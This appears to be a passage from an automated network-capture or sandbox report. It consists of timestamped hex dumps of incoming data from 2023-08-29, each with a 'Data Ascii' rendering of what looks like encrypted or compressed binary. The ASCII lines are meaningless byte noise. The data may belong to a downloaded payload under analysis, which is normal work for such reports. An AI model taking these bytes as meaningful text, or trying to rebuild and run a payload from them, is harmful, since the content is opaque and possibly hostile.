                                                                                                                  2023-08-29 17:16:42 UTC1160INData Raw: 7f d9 23 70 7f e5 1d ea f0 c9 78 95 7e 04 22 89 45 72 ce eb 9a 72 fe eb b6 59 22 2f 7e 6f 99 8e d1 74 85 d0 78 88 24 19 78 60 27 40 65 77 21 ef e9 76 19 9c 85 4c 1d d0 95 49 1a bb 75 25 28 ac 45 78 94 e1 d0 78 bc e1 f3 49 28 32 74 a3 28 26 74 1d 19 e2 24 7b 94 e2 d0 7b a1 d0 77 6c 2a e6 76 3c 2a 51 45 7a b8 e3 f4 7a a4 e3 83 49 2a e9 71 0c 2d 9d 71 f7 19 e4 8e 7d ce e4 56 7c 5b d0 70 03 2c 82 70 ce 2c 66 45 7f a7 e6 83 7f 73 e7 37 49 2e 56 72 d9 2e 7e 72 f3 19 e7 83 7e cb e7 bb 7e 05 d0 7d 61 21 e4 7d 09 21 9c 45 71 41 e8 21 71 69 e8 e1 49 21 7e 7d ff 21 07 7d a2 19 e8 43 70 0e e9 65 70 21 d0 7c 0d 20 80 7c 15 20 44 45 70 ba e9 ee 70 a8 e9 8d 49 20 1e 7c 96 20 26 7c b4 19 e9 e5 73 ed ea 74 72 b5 d0 7e 08 25 81 79 14 25 bf 45 75 66 ec ce 75 80 ed e0 4d 24
                                                                                                                  Data Ascii: #px~"ErrY"/~otx$x`'@ew!vLIu%(ExxI(2t(&t${{wl*v<*QEzzI*q-q}V|[p,p,fEs7I.Vr.~r~~}a!}!EqA!qiI!~}!}Cpep!| | DEppI | &|str~%y%EufuM$
                                                                                                                  2023-08-29 17:16:42 UTC1164INData Raw: 54 48 19 22 84 c9 94 c6 8d 40 19 d6 c5 48 18 d0 e5 93 aa d9 45 a3 99 d1 b9 c9 18 70 55 fd 10 d0 39 c9 1a e2 c5 4a b3 90 c5 48 49 50 44 17 99 d1 29 c9 18 7a 3f c9 18 58 c5 48 81 50 44 e7 99 d1 ef f5 99 d1 83 c9 18 0c c5 48 f7 50 44 cb e7 50 44 47 ac d9 45 57 99 d1 ef 63 99 d1 7d c9 18 9a 85 49 6b 10 45 e3 67 10 45 c7 d9 d0 e9 89 19 12 85 49 33 08 85 49 f7 10 45 b5 d9 d0 55 ff b2 10 4e 89 19 ea 85 49 4f 10 45 17 d9 d0 ef 8f d9 f0 33 89 18 52 85 49 89 10 45 e3 87 10 45 fb d9 d0 87 89 19 04 85 49 ab 3c 85 49 13 67 85 2d d9 d0 79 89 19 7a 0b 89 19 bc 85 49 91 10 45 eb d9 d0 ef fd d9 d0 81 89 19 00 85 49 f3 10 45 e9 19 68 4c 49 03 10 45 67 d9 d0 ef 05 d9 d0 23 89 0e 88 85 49 51 10 45 e3 25 10 45 e7 d9 92 e5 89 19 54 85 49 b3 a4 85 49 45 10 45 67 d9 d5 5b 89 19
                                                                                                                  Data Ascii: TH"@HEpU9JHIPD)z?XHPDHPDPDGEWc}IkEgEI3IEUNIOE3RIEEI<Ig-yzIEIEhLIEg#IQE%ETIIEEg[
                                                                                                                  2023-08-29 17:16:42 UTC1168INData Raw: 45 41 b2 28 44 78 19 71 7d 49 13 e8 45 ea 21 d0 ef 4a 29 d0 43 79 19 d9 75 49 c5 e0 42 49 c2 72 76 39 25 d0 11 49 19 bf 45 1a 19 a4 45 3b 19 d0 2c 49 77 d0 22 49 39 d0 67 1c 69 d0 24 49 6f e0 45 20 19 5a 29 19 19 b2 15 49 7c d0 7b db 10 d0 17 49 5e d0 07 49 25 d0 a5 6c 19 b4 45 65 41 d0 94 48 68 d3 27 22 29 d0 2a 49 6e 80 45 b8 19 a3 10 39 1a 94 75 49 7f 80 41 3c 49 d4 31 0c 2b d4 02 f9 1f b1 45 30 89 d7 20 fd 19 a8 71 48 5c e2 42 da 1f b4 b5 49 93 94 f5 4e 6a ca 44 49 19 86 b5 49 bb bc 35 4d 7c d0 09 9b 18 a4 31 41 ac 61 42 0e c9 d6 0c 19 1a c1 44 3a ad da 67 00 05 d9 79 49 29 20 43 6c 19 5a 35 bd 18 91 75 48 70 d0 28 93 15 2b d6 48 68 de 09 79 10 c7 46 f0 17 83 45 38 18 7d f6 49 6a ef 45 7f 11 9f 75 49 4d e0 45 23 39 20 41 26 6b d0 0d 79 1e a1 45 0a cc
                                                                                                                  Data Ascii: EA(Dxq}IE!J)CyuIBIrv9%IEE;,Iw"I9gi$IoE Z)I|{I^I%lEeAHh'")*InE9uIA<I1+E0 qH\BINjDII5M|1AaBD:gyI) ClZ5uHp(+HhyFE8}IjEuIME#9 A&kyE
                                                                                                                  2023-08-29 17:16:42 UTC1172INData Raw: 82 4e dd da 71 2b 19 c1 25 49 d1 cf 7c 39 47 10 a5 4e 7c 62 24 3e 78 ab 23 a9 61 83 0e eb 59 b3 33 bd 79 c5 3b 84 e6 8f 75 72 79 d4 a0 81 51 b2 c9 2a 62 d1 45 09 ff 99 a2 54 c2 05 a6 54 c1 00 b6 54 86 be 96 b6 17 2f 4b ba 17 4f f5 4d e4 de cc d2 69 d6 b0 47 64 e0 43 b8 17 cb 94 39 43 3f 35 48 e8 de 34 40 e8 fd 2c b9 07 62 39 f9 10 f0 bc 9f 2d a0 7d f9 1d 5f b5 e7 2d 22 48 78 0a 21 48 3b 69 d0 de 79 19 45 b4 44 71 20 44 95 a9 d2 23 91 6a dc cd cd c5 e3 37 45 65 2a 76 36 51 7f ba 65 e6 fc 3a 36 63 dc 1e 39 1f ad 35 4b 98 a1 49 61 fe e0 35 02 c0 ef 5d 94 24 c8 b8 79 1a 83 1f 18 17 a2 b1 12 68 ed 73 49 69 c9 16 46 6f 20 45 36 03 d0 45 49 5d a7 28 0c 61 a4 20 27 19 b4 03 3b 78 bd 20 00 77 d0 31 26 5a bc 2c 2c 77 a4 55 08 6b b5 24 bd 18 99 36 0a 11 bf 28 39 8d
                                                                                                                  Data Ascii: Nq+%I|9GN|b$>x#aY3y;uryQ*bETTT/KOMiGdC9C?5H4@,b9-}_-"Hx!H;iyEDq D#j7Ee*v6Qe:6c95KIa5]$yhsIiFo E6EI](a ';x w1&Z,,wUk$6(9
                                                                                                                  2023-08-29 17:16:42 UTC1176INData Raw: 3a 78 24 ad 74 3d 29 d2 3e 45 86 7c 47 49 1d e1 05 39 98 0a 70 39 e7 e0 45 41 c3 0b 36 27 f7 60 45 30 15 0e b5 49 66 dc 14 3a 15 58 99 7c 63 dc dd b9 19 ce f3 94 66 dc 34 45 6f a0 41 3c 15 9c 35 4e b5 c9 9b 36 15 ad 49 bb a9 d4 13 d9 eb 5e 20 f9 0e 81 b6 48 19 94 45 1c a9 41 53 69 09 ef b0 26 39 c6 35 69 19 9f e6 1b 03 61 47 69 19 87 77 bf 7d 42 5e 41 19 d0 dd 79 1e 70 ac 7c 69 d2 a5 39 19 ce a9 7c 69 fc bf 48 a9 ac 23 7d 69 a5 20 7d 69 d2 e0 39 19 c8 27 7d 69 9e 21 49 2d a0 47 bf 2c a0 80 b0 1c 20 44 4c a9 9f be 7c 69 4b bb e8 e9 16 47 7f 69 be 75 49 bf e0 45 1c 6c d2 9d f9 19 35 75 4d 61 a0 47 db 0b d6 f5 48 1e e6 ba 4d 7d e4 22 ff 19 a0 9e 41 2f a0 02 4f 2f d0 35 8d 1c e1 35 01 14 e6 45 39 04 df 73 39 0f b6 71 09 69 a5 20 7d 69 75 45 71 01 d0 27 7d 69
                                                                                                                  Data Ascii: :x$t=)>E|GI9p9EA6'`E0If:X|cf4EoA<5N6I^ HEASi&95iaGiw}B^Ayp|i9|iH#}i }i9'}i!I-G, DL|iKGiuIEl5uMaGHM}"A/O/55E9s9qi }iuEq'}i
                                                                                                                  2023-08-29 17:16:42 UTC1180INData Raw: 75 49 d8 c1 45 2c 18 eb 45 2e 29 d0 54 49 f3 d7 d7 48 22 a0 47 75 06 d0 51 4d c8 d1 18 5a 19 b2 77 48 28 d0 76 48 59 e0 45 b8 0e 40 4d 99 34 d2 45 8d af d2 72 49 20 7d 15 49 96 c0 47 5a 19 ed d5 48 27 e2 40 1c c8 d6 7b 79 19 d5 91 49 23 82 45 4a f2 28 43 5a 19 ef 93 4e 26 c0 45 7c 1e 80 25 18 03 d0 47 49 11 00 42 5c 89 d0 78 b6 69 d0 16 42 68 d1 f4 49 6c d0 70 48 42 d1 76 49 3e d5 45 78 18 d3 45 75 19 a1 2d 00 19 d0 2b 49 6f d0 24 49 75 d0 65 20 19 b4 45 69 ad d0 30 49 33 b5 f5 49 70 60 44 69 8b d1 36 49 93 a4 d5 49 34 e0 45 39 19 bf 95 49 3b ea 57 57 4b d0 06 59 19 98 45 e3 58 40 45 69 a9 d2 20 59 19 b4 95 48 3b f0 75 4d 39 d0 2d db 1b a4 45 cb 37 66 47 00 19 9e 45 1d 86 d2 fe d3 1b e3 40 05 06 d5 3a 4b 29 d0 00 19 19 33 5a 4c a6 d7 06 49 4a a0 47 76 1c
                                                                                                                  Data Ascii: uIE,E.)TIH"GuQMZwH(vHYE@M4ErI }IGZH'@{yI#EJ(CZN&E|%GIB\xiBhIlpHBvI>ExEu-+Io$Iue Ei0I3Ip`Di6II4E9I;WWKYEX@Ei YH;uM9-E7fGE@:K)3ZLIJGv
                                                                                                                  2023-08-29 17:16:42 UTC1184INData Raw: 29 e1 a3 f0 45 28 19 a9 45 48 19 97 45 e9 7c d0 31 49 5d d0 15 25 15 48 e7 05 19 c4 2b 49 7e d0 61 21 19 9c 45 0a 19 bf 45 24 19 a0 45 43 6c d0 79 2c 19 ec a9 53 29 a0 ef a1 19 d6 a1 49 1f 30 45 4f c1 d0 43 63 d9 d0 43 e5 19 d6 d9 49 1f e1 66 49 f9 6f 38 88 f3 95 d3 7c 19 70 3f d9 2e 2e 71 bb fb d0 e7 08 7b 22 eb 08 90 0a 45 fe 85 5f b0 dd a2 54 9a 49 a8 75 85 f0 1c 93 fc 73 19 8b c5 78 9f a0 2c 08 db d0 04 c7 c6 ec 6b 0a b8 7e 45 46 62 89 99 cb 12 05 28 49 e8 a8 dd e8 cb 9c f4 31 19 e1 24 77 2b c2 11 6b 18 d9 47 d3 19 10 46 4f 5f 18 f6 c2 19 ba b9 82 c8 90 dd 57 26 d0 cf e6 80 c3 3e 29 05 e1 55 39 93 2b 7d 4f 1a ac 7c 7e 19 a0 67 73 2e a0 d3 7c 2e d4 35 ed 19 d7 fd 52 28 a0 66 49 2e e7 35 04 3f e7 35 87 a9 e4 72 39 a6 50 44 c8 1c 1c c5 52 9b 11 c5 42 32
                                                                                                                  Data Ascii: )E(EHE|1I]%H+I~a!EE$ECly,S)I0EOCcCIfIo8|p?..q{"E_TIusx,k~EFb(I1$w+kGFO_W&>)U9+}O|~gs.|.5R(fI.5?5r9PDRB2
                                                                                                                  2023-08-29 17:16:42 UTC1188INData Raw: b7 45 68 c2 24 fd 12 e5 47 b8 19 2e 2a bf 2b 21 45 b8 04 61 50 58 20 a1 cc f8 1b 2b 94 48 a8 d0 28 75 3c e5 44 48 19 61 45 da 0e 2f 9e 07 6e d1 9a 0f 62 d3 1a 0c e4 d1 9e 0d a2 d1 ba 54 0c 69 44 10 58 a7 44 5e 23 e7 44 5a 1d 41 42 f6 24 d1 30 53 60 d1 d8 7d 64 8e f2 4b 5a 62 78 34 e2 d7 06 39 1b a1 4b 3a 57 a7 44 5e 17 9c be 19 19 a3 4e 0a 0b cf 94 0b ac ca d4 7c 48 9a 3a 72 16 a1 70 f8 19 69 0c b8 4d 6f 44 48 19 9b 90 d9 18 b1 55 59 70 60 45 00 c9 d1 b4 41 e4 61 4a 00 4b d2 b4 41 aa b4 b0 49 08 dc 70 7a c7 98 f5 48 20 c4 b4 49 a8 f2 3c bb 1c 23 4a 36 ae d9 de 58 20 db fc 57 06 c5 72 48 ea d1 2d e4 2b 90 31 13 5a a1 44 28 6b d8 36 19 51 ab 74 45 48 db 03 d9 16 a1 77 d8 5d 61 69 0f 6e 42 44 d8 9b cb 58 0f 4b d9 36 51 40 d5 03 fe 89 d0 14 4b e8 b0 2c d9 1d
                                                                                                                  Data Ascii: Eh$G.*+!EaPX +H(u<DHaE/nbTiDXD^#DZAB$0S`}dKZbx49K:WD^N|H:rpiMoDHUYp`EAaJKAIpzH I<#J6X WrH-+1ZD(k6QtEHw]ainBDXK6Q@K,
                                                                                                                  2023-08-29 17:16:42 UTC1192INData Raw: 41 3d 75 d9 c1 a9 18 40 7a 29 19 35 57 28 1d a1 4c a0 1f b2 3d f2 22 04 35 89 75 d9 95 a9 18 0c ad 5b 78 d4 d2 38 10 39 43 48 19 80 a5 4d 15 25 2e 40 e3 cc a5 48 31 b0 45 2c 10 b1 41 38 10 39 43 12 7b f1 a5 4d 41 b8 47 28 77 b8 a5 48 61 29 25 49 0d 34 a2 55 f8 d4 b4 e1 70 d7 44 49 b3 10 a5 4d b1 bc 56 f1 f9 d1 81 29 19 8f 20 40 78 d4 34 5a f0 d6 44 49 f1 30 41 bd d8 bc 4c 4d ef e0 35 59 79 d0 a0 55 16 b1 41 38 10 39 43 48 19 e0 f9 72 69 06 05 a9 1f b9 4c 19 f9 d1 19 29 19 35 57 e6 78 d4 34 40 f0 d6 44 49 41 30 41 c5 75 d9 bf d5 f9 d1 ed a1 0b b1 41 38 10 39 43 48 19 70 c5 f4 22 a0 9d 25 10 38 a5 48 a7 24 ad 5b 78 d4 34 40 f0 d6 44 49 b1 30 41 9d 3d 27 2e 40 2d 30 44 09 79 d0 a0 5b 16 b1 41 38 10 39 43 ab 1d 10 7e 39 69 25 29 40 99 30 44 c5 79 d0 a0 5b 78
                                                                                                                  Data Ascii: A=u@z)5W(L="5u[x89CHM%.@H1E,A89C{MAG(wHa)%I4UpDIMV) @x4ZDI0ALM5YyUA89CHriL)5Wx4@DIA0AuA89CHp"%8H$[x4@DI0A='.@-0Dy[A89C~9i%)@0Dy[x
                                                                                                                  2023-08-29 17:16:42 UTC1196INData Raw: 25 49 eb 18 25 49 1d f7 22 43 78 d5 a7 ff 74 b1 28 a9 1d cc 25 4a e8 72 a1 21 12 b1 42 bd 74 20 4f 7d 79 d7 34 5c 39 b0 41 20 05 e0 92 a9 18 39 43 40 19 88 25 41 49 38 40 a8 01 7a 25 a9 18 a4 25 49 89 b0 45 85 f1 d6 92 28 1c 21 5d a8 1e a4 b1 51 b5 b8 4e 28 1e 8a f9 b9 13 44 3a 45 ab d3 ad 35 15 28 36 35 1a 69 7b 5d 31 60 51 79 19 21 45 9d 46 20 41 f6 27 60 48 bd 18 d5 45 bd 69 d2 09 a2 21 d1 34 4d 45 20 45 2d 2d d1 b4 48 66 d4 c6 79 3a ac 41 51 e2 eb 35 dd 65 d4 bf ed e9 d0 e9 7d 18 21 44 36 1d a0 4a 35 1d 8a 7d 39 1b 0c 7d 48 28 df a9 b9 19 28 7c 79 19 c4 6c 3d 7f e0 47 f6 0b d0 45 24 68 d3 11 3d 1f 2d 7c 79 ad d3 f0 40 59 ad b5 49 51 e4 44 7c 1a 2d 41 70 1a d1 45 31 b4 a0 47 31 21 d1 f4 55 91 20 45 d1 29 d0 1a b0 10 a1 47 36 39 a0 44 b5 1d 48 35 4b d1
                                                                                                                  Data Ascii: %I%I"Cxt(%Jr!Bt O}y4\9A 9C@%AI8@z%%IE(!]QN(D:E5(65i{]1`Qy!EF A'`HEi!4ME E--Hfy:AQ5e}!D6J5}9}H((|yl=GE$h=-|y@YIQD|-ApE1G1!U E)G69DH5K
                                                                                                                  2023-08-29 17:16:42 UTC1200INData Raw: 4f 35 59 9d fc c8 19 2f 15 45 ee b0 9d 52 d9 27 9d ec 0e 30 43 b6 7f e6 05 70 39 de 83 0f 7e 35 a4 4b 4e b0 76 89 94 86 55 a9 2d 71 71 c0 19 96 41 c0 5f dc cc 0f 11 98 cc 7c 49 30 4d c2 d3 10 f7 a1 1b 9a c5 67 9c 10 38 40 df d5 44 28 40 d1 ae 4e de 96 41 6d 01 d0 45 49 98 87 cc 4d 94 ae 41 49 9a ef 45 3d 33 53 3b 45 d9 d0 31 43 4e 38 46 f9 09 02 70 45 5f f8 e4 5e 59 db ba 18 11 53 05 8f 09 86 ba 5c f9 c1 5a 6e 1b d0 ff 7f 98 3c 05 4b 19 d0 45 e8 49 c0 79 39 2a 15 cc 29 5c 2c ce 0c 15 81 56 08 7a c0 4d c0 9c 1c 85 47 92 95 51 7a 59 26 7e b7 90 6d 85 89 19 59 41 cc dd 80 45 46 9d 46 44 49 59 d0 7e 8f 16 54 cb 39 19 59 05 7e 90 e0 ba 5c 2d c0 41 c0 3d 65 8d 99 18 6e 41 09 18 86 c8 1d 9c 04 f5 49 49 c0 09 91 08 c7 9d 09 9c 0b 30 50 f1 15 b4 4d e9 f4 c8 c4 78
                                                                                                                  Data Ascii: O5Y/ER'0Cp9~5KNvU-qqA_|I0Mg8@D(@NAmEIMAIE=3S;E1CN8FpE_^YS\Zn<KEIy9*)\,VzMGQzY&~mYAEFFDIY~T9Y~\-A=enAII0PMx
                                                                                                                  2023-08-29 17:16:42 UTC1204INData Raw: ce 0c 19 c0 fc 49 18 d0 45 72 d8 d0 36 0b 92 85 51 1f 94 e4 45 59 22 21 1b 3e 2f 53 38 4d 01 d0 40 fb 37 5b 08 41 7f f8 c6 30 37 d1 e9 4c 18 c0 58 88 19 32 47 1b 94 94 c4 3d 49 d0 ba 3c 01 38 ee d4 1e d0 45 ca dd dc 76 89 f2 d5 fd c9 4e d0 42 c9 44 12 51 4a 7f f4 fd 48 19 fc 87 45 1a dc c6 25 19 f4 41 4d f0 d9 b9 b6 e6 c9 4d 47 b6 2b 41 47 1b 41 13 1e 92 d0 38 41 94 67 3d 4d 19 d0 45 1f e6 c5 95 5b 29 a0 c0 49 d9 a5 54 cc e6 a4 4c 23 79 d1 ce 86 f1 4f 45 65 19 b4 47 c9 92 d6 1a 17 44 12 41 40 32 d4 f8 b6 93 f3 ce 3c 11 55 b3 49 6c d4 77 89 f2 fe 2d 35 18 50 63 a1 bc 29 ba b6 9c 10 65 10 6d c6 c6 e9 98 fe 45 8e 19 d0 49 6d 29 a0 82 09 1d d0 a9 6a 29 a0 ae 4b 2a 10 c5 cc d9 59 43 46 8c 10 c2 62 1c d2 61 18 19 98 51 7a d9 eb bd 49 91 95 ba 3d 53 e9 00 41 19
                                                                                                                  Data Ascii: IEr6QEY"!>/S8M@7[A07LX2G=I<8EvNBDQJHE%AMMG+AGA8Ag=ME[)ITL#yOEeGDA@2<UIlw-5Pc)emEIm)j)K*YCFbaQzI=SA
                                                                                                                  2023-08-29 17:16:42 UTC1208INData Raw: ba 9a d9 d1 09 08 d9 d1 1b 16 93 95 ba cb 39 c4 95 49 92 a5 55 29 10 3d 85 16 39 04 01 af 4f d0 27 a1 d1 33 27 59 c0 d1 e5 31 90 96 41 7a d9 b6 c6 c9 67 de 4d 8e 5f d8 25 a8 86 d0 03 5d 6a f2 23 8e 5f de 65 69 19 17 03 59 b8 f2 82 0f 3b f8 24 1e de 96 69 68 4e 17 03 4f 29 31 13 49 df 80 15 c4 54 c0 55 18 49 86 17 29 9e 2f 50 51 19 c1 75 39 9c 10 cc 4a 6d d2 c6 68 3f a4 42 19 e6 c5 61 40 59 d2 ce 4a b9 f6 13 c0 1e 59 25 06 1d 38 87 b4 d8 de c5 67 16 b0 d1 8b 91 c0 1b 68 0f 10 51 16 5e 34 51 a3 52 d0 0e 59 2b 10 44 02 b8 d1 64 60 54 d8 c0 80 16 54 d3 5a 59 d1 35 59 0c 90 64 6f 4c c4 b2 4b db f1 55 3d 3d 26 87 4b 6d c0 4e c8 fb 2d 25 40 9a 1a 4d 49 f2 de b3 8b 11 a4 4c c8 15 32 b2 bb 19 90 c7 b6 e7 d0 45 1c a9 d2 47 f9 1b d6 95 49 e4 f0 7f fe 99 12 c0 89 4a
                                                                                                                  Data Ascii: 9IU)=9O'3'Y1AzgM_%]j#_eiY;$ihNO)1ITUI)/PQu9Jmh?Ba@YJY%8ghQ^4QRY+Dd`TTZY5YdoLKU==&KmN-%@MIL2EGIJ
                                                                                                                  2023-08-29 17:16:42 UTC1212INData Raw: ad 72 da a7 0c cc d9 90 ce 3c 01 59 00 a5 19 4e 03 1c 19 4e b8 48 56 9e 41 06 f1 d2 0a 87 b1 38 8f b8 1d 9f ad 4e 56 9e 45 06 99 d6 ba 4a e9 59 30 51 19 4c 45 c1 4c 2d 7e ba 6e 93 c0 19 ef 5b 18 55 19 99 06 49 50 2c 50 48 50 9b 41 00 ed d2 0c 82 f1 50 c4 48 50 95 b1 62 df 55 b3 4a 5f c2 0e 49 5f d3 ba 49 58 d3 9d c0 19 8d 59 c1 4c 2c ce 04 f1 d0 7e b0 02 10 b2 91 32 1f 45 ca f1 d1 66 88 1a 17 7e 49 e9 cb 8c be c0 53 ac 48 19 fb 83 6a d1 5b 00 b9 1a d0 8b 72 d8 cb 9e be c2 53 45 a2 18 fb 8d 6a c0 d3 9d 49 22 8d 65 46 9b 7a b8 b6 19 2f 1a 17 42 5b a0 14 db d8 65 49 d5 d9 45 c2 e6 85 ce 49 f5 53 a9 65 4a 86 76 bf 19 87 76 b6 22 16 cc 3c e9 d0 cc 34 e1 59 30 a1 90 a5 45 bd df 95 bb 49 df 95 b8 4c 99 d1 b9 c9 18 2f 45 c0 6c 04 4d 8e 5c 08 c4 f4 de 95 99 b6 38
                                                                                                                  Data Ascii: r<YNNHVA8NVEJY0QLEL-~n[UIP,PHPAPHPbUJ_I_IXYL,~2Ef~ISHj[rSEjI"eFz/B[eIEISeJvv"<4Y0EIL/ElM\8
                                                                                                                  2023-08-29 17:16:42 UTC1216INData Raw: 4a 5d 9b a9 c4 90 44 50 f1 61 92 85 45 b1 18 85 75 ca d9 d1 c6 6d da d1 44 36 5c f8 c5 2a 16 52 47 4f 18 d8 00 b5 92 9d 65 62 99 18 7c 04 ed df c3 4c d9 93 c5 ca 64 1c 45 8e 5c f8 04 6c 11 df c3 bd 59 d1 c8 2d 3d d0 85 c2 4c e4 ce 0c d1 90 7e 09 3c 9a 51 09 3c c0 85 0c 15 82 40 01 f1 fc a8 9e db 97 07 0f b0 94 03 1c 01 58 c8 45 09 90 4e c0 54 04 47 4b 01 c0 46 8b 98 95 c5 19 54 38 c8 e9 15 a0 cc 04 e5 5e 0d 79 9d 98 41 87 d4 10 60 3c 3d eb b2 c2 29 8d b9 3a 21 12 5a 83 5e 9d 7d 0e 59 c7 04 20 58 bb 17 19 48 12 02 d0 96 d1 48 82 5e d1 06 c9 51 5b 10 a9 5a 99 50 c9 67 24 44 03 4c d0 ec b9 6b 50 d4 85 5f eb 00 85 18 55 c7 59 5b 95 45 65 9c 10 1a 12 6d dd ce 59 11 5b d4 c9 59 e4 2f 49 49 80 ba 9b a9 d1 81 8a d5 dd 45 c2 19 2f 10 c2 f5 ba ba 21 91 f0 0a 70 69
                                                                                                                  Data Ascii: J]DPaEumD6\*RGOeb|LdE\lY-=L~<Q<@XENTGKFT8^yA`<=):!Z^}Y XHH^Q[ZPg$DLkP_UY[EemY[Y/IIE/!pi
                                                                                                                  2023-08-29 17:16:42 UTC1220INData Raw: 88 a1 b9 d0 6c 4e 19 5b a0 14 db fc 41 49 d5 d5 45 c2 e6 85 ce a5 11 51 a9 a1 d9 c0 e4 19 09 ec 45 39 2a 15 cc 0c e5 5b 00 4d 05 83 85 62 2a 02 7e 8b 4f d0 12 c0 4c 20 31 42 92 d8 45 c8 f8 2f 4a 49 19 59 08 49 e9 eb 87 c0 4c 30 31 45 39 df f2 09 1b f5 c7 4d 5c 30 4d c2 5c f0 45 6b 61 dc 6e 31 19 d4 ce 39 11 5b 46 62 d8 d0 cc 0c cd 5b 06 41 92 00 45 62 1a fb b4 62 c8 5d 49 43 9c 11 23 c0 99 ee 08 b9 9c 19 45 c0 6c 18 cc 34 dd 59 10 49 ed 59 00 95 16 54 63 4a b9 d0 45 ca 64 30 c5 25 05 90 47 68 d9 cc b7 46 9d c2 05 4b 22 2a 4d 46 9d da 84 48 db df c1 4b 18 10 44 c2 5a dc 6e 0a 1d df 45 cd ef d2 45 49 20 85 6d 49 90 9d c9 c2 54 30 cc 1c 19 54 cc 1c 91 59 08 d9 16 d4 c1 97 d9 d5 2f 25 4b 5d d0 8b 01 50 79 1b f1 2d 6f 89 23 d1 0d 54 99 88 2f 89 5e 14 40 49 53
                                                                                                                  Data Ascii: lN[AIEQE9*[Mb*~OL 1BE/JIYIL01E9M\0M\Ekan19[Fb[AEbb]IC#El4YIYTcJEd0%GhFK"*MFHKDZnEEI mIT0TY/%K]Py-o#T/^@IS
                                                                                                                  2023-08-29 17:16:42 UTC1224INData Raw: 44 42 92 85 65 46 19 7f 86 62 d1 59 08 d5 92 50 0a 4d 32 9a 41 7a cb d0 48 4b d1 d0 48 3c c1 e3 97 c0 5c d0 c5 46 b6 95 9d 62 d1 5b 45 0c f9 53 85 b6 16 7f 83 48 18 f4 cc 04 8d 53 85 48 90 b0 00 cd 92 95 81 cc 13 d1 4d cc 1b a4 45 67 94 96 4d 74 e6 cf c5 49 19 a7 4b a1 1c dd 05 66 19 14 2d 85 d5 d0 45 a2 16 d8 2d 94 c4 50 38 b6 0c 0c 56 49 29 a0 c6 8d 1d 80 ad ec 1b bf 04 0b 39 5b 30 85 92 85 45 a5 90 95 99 c2 5c 50 cc 49 5c 6c ce 0e 1d 5b 9d 46 19 7f 18 9d 32 91 41 4a 06 d0 cc 0c bd d3 18 d1 94 d4 45 3f 49 59 18 8d 90 85 e5 49 90 a5 f5 a1 bd b8 ba b6 18 d0 55 cc d9 59 00 e1 16 54 45 ec 18 d0 45 c9 24 65 52 4d 25 a0 45 37 b5 a5 49 a1 08 f0 33 48 19 16 40 48 1d d1 c8 49 54 68 14 c4 4c 64 17 1f 19 38 8b 3c e6 2f c0 89 16 50 d8 89 9d 10 4a cd 6b 50 49 49 92
                                                                                                                  Data Ascii: DBeFbYPM2AzHKH<\Fb[ESHSHMEgMtIKf-E-P8VI)9[0E\PI\l[F2AJE?IYIUYTEE$eRM%E7I3H@HIThLd8</PJkPII
                                                                                                                  2023-08-29 17:16:42 UTC1228INData Raw: 65 48 e6 d0 47 6b 92 f0 dd 0c a9 5b e5 97 d9 eb 25 8b 16 52 ac b3 99 ec 65 8b 4c d0 a1 c2 5c 70 44 0c d1 53 61 8b 18 34 f2 cb 5e 90 46 a0 5e c3 a4 d3 9a 0c c6 72 79 d1 ae 4e 94 dc 21 6d b9 ec 05 a9 2d 5b 10 61 41 fb 07 4d 39 99 85 0e d9 b0 45 55 0a b1 3e a9 19 dc 17 c9 19 d8 ad ee 1b 52 05 42 5e d8 ce 46 22 11 4d 46 97 37 e4 78 4c f0 6e 88 2d 5d 49 49 64 cc c5 7d 59 e2 46 87 10 11 7d 81 3a d0 7c 8a 1a 1b 46 c9 da d3 93 72 d8 59 08 09 f7 c0 51 46 9d 63 45 4f 16 66 38 53 09 70 71 f0 db b0 07 7f 54 0c 6e 49 c3 5d 71 59 92 95 8d 62 2b 1a 64 ba 44 3c 65 40 d9 e6 18 a5 70 51 73 55 2a 91 50 59 58 c5 45 4a c0 30 4a e6 c6 11 be b6 98 2f c4 b6 98 2f ba c8 e6 51 ba c8 e6 51 ba c8 e6 51 ba c8 ec 51 6f 81 e1 51 a9 ba 98 2d 37 c8 df 95 6f b7 29 d0 b9 b4 98 e8 b1 c8 1e
                                                                                                                  Data Ascii: eHGk[%ReL\pDSa4^F^ryN!m-[aAM9EU>RB^F"MF7xLn-]IId}YF}:|FrYQFcEOf8SpqTnI]qYb+dD<e@pQsU*PYXEJ0J//QQQQoQ-7o)
                                                                                                                  2023-08-29 17:16:42 UTC1232INData Raw: 4c 7b d9 54 55 23 75 90 c8 cc 35 2f ba b6 99 c6 ad 49 3e 0a 43 49 92 de ce 08 39 b4 c6 8d 15 ba c5 44 94 45 04 68 1a 82 2f 49 4f 17 27 4d 75 d1 05 40 e6 00 c0 89 65 11 ce c5 94 ec a5 48 19 f1 ce 4b 4a 50 0b 49 35 5b 1a 41 92 23 6e b9 19 59 08 89 92 df 6e 81 92 d4 07 41 f9 ce cc 3c a5 5b b5 59 32 d7 6e ba d9 b4 66 3c 21 d0 b2 9b 92 0a cc 1c b5 f3 45 1c a5 f3 9c 4a db 5b 52 49 1a 23 cc 0c f1 5b 02 4d 39 5b 9d 46 b6 4d e4 40 1a 4d 47 19 b9 d0 cc 04 a9 5d 51 1a 19 59 08 9d 90 9d 89 c2 54 d0 6d c2 c1 fb 1c 4d 99 ad 45 6d 19 59 30 f1 90 85 a9 c9 90 8d 95 46 9d 34 46 69 28 58 95 72 4e 12 70 ca 44 d4 e5 48 19 9d 6d 7a c2 e3 ba 7a ef d0 ce 8b 32 91 41 c0 64 f4 65 c0 44 08 cc 14 f9 5e a1 c0 19 8d 99 c0 44 48 82 0c 85 92 ba 29 0e 17 00 e9 e6 30 45 8e 35 95 e1 49 14
                                                                                                                  Data Ascii: L{TU#u5/I>CI9DEh/IO'Mu@eHKJPI5[A#nYnA<[Y2nf<!EJ[RI#[M9[FM@MG]QYTmMEmY0F4Fi(XrNpDHmzz2AdeD^DH)0E5I
